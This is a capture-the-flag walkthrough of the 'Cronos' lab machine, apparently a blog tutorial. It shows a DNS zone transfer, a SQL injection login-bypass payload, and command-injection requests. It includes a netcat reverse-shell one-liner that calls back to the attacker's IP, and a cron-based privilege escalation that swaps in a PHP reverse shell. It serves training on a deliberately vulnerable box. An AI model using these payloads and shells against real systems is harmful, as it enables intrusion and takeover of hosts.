Summary

Cronos is an easy Linux box that can be exploited by properly enumerating all ports and services. You will find that there are multiple domains by enumerating DNS. The admin login page is vulnerable to SQL Injection after which you can execute command injection to obtain a low level shell. Privileges can be escalated by exploiting a php cronjob.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.223

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After navigating to the server, I quickly started enumerating DNS. In this case you have to add the domain cronos.htb to your hosts file. You can now run dig to enumerate subdomains like so:

dig axfr @10.129.28.223 cronos.htb

; DiG 9.16.4-Debian axfr @10.129.28.223 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.129.28.223
admin.cronos.htb.	604800	IN	A	10.129.28.223
ns1.cronos.htb.		604800	IN	A	10.129.28.223
www.cronos.htb.		604800	IN	A	10.129.28.223
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.28.223#53(10.129.28.223)
;; WHEN: Mon Oct 26 20:48:09 CET 2020
;; XFR size: 7 records (messages 1, bytes 203)

Exploitation

The server showed that Laravel Framework was used so I spent quite some time looking into exploits for the laravel framework. However, this was apparantly not the way to go so I kept looking and finally found that the admin login is vulnerable to a SQL Injection. I used BurpSuite to test this and found the following payload:

username=tes'%20OR%201%20--%20-&password=test

URL decoded to:

username=tes' OR 1 -- -&password=test

The server returns a 302 Found to:

HTTP/1.1 302 Found
Date: Mon, 26 Oct 2020 19:56:28 GMT
Server: Apache/2.4.18 (Ubuntu)	

location: welcome.php

It was successful to bypass authentication and the user is now presented with a new page.

Command Injection

At this point it is relatively clear that there is a command injection. The ‘ping’ option was intercepted and looked like this:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb

command=ping+-c+1&host=10.10.14.31

After experimenting with this command it was found that you can execute commands by using the following payload:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
	
command=ls;ping+-c+1&host=10.10.14.31	

With the following request you can get the user.txt from the user noulis:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb

command=cat%20/home/noulis/user.txt;ping+-c+1&host=10.10.14.31

I found it a little bit tricky to get a reverse shell as netcat and php reverse shells from pentestmonkey both didn’t work. I looked up what reverse shell was used and found this one:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f

URL encoded this with Burp and managed to get a reverse shell this way.


Privilege Escalation

I always start by running linpeas. Linpeas flagged the following in red/yellow which means its highly suspicious:

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

This file has the following permissions:

-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan

This means you, as www-data user, can modify this file and root will run this every minute. It is important to mention that it is a php file. This PHP reverse shell from pentestmonkey was downloaded and named artisan. It was transferred over with wget and a minute later a shell was obtained with the root user!


Conclusion

I found this box a lot of fun. It started off a bit difficult with the DNS stuff but it turned into a really nice and straightforward box. It was often very clear what the exploitation path was so this saved some time. I spent a couple hours on this box and had a lot of fun doing it. Hope you enjoyed my tutorial!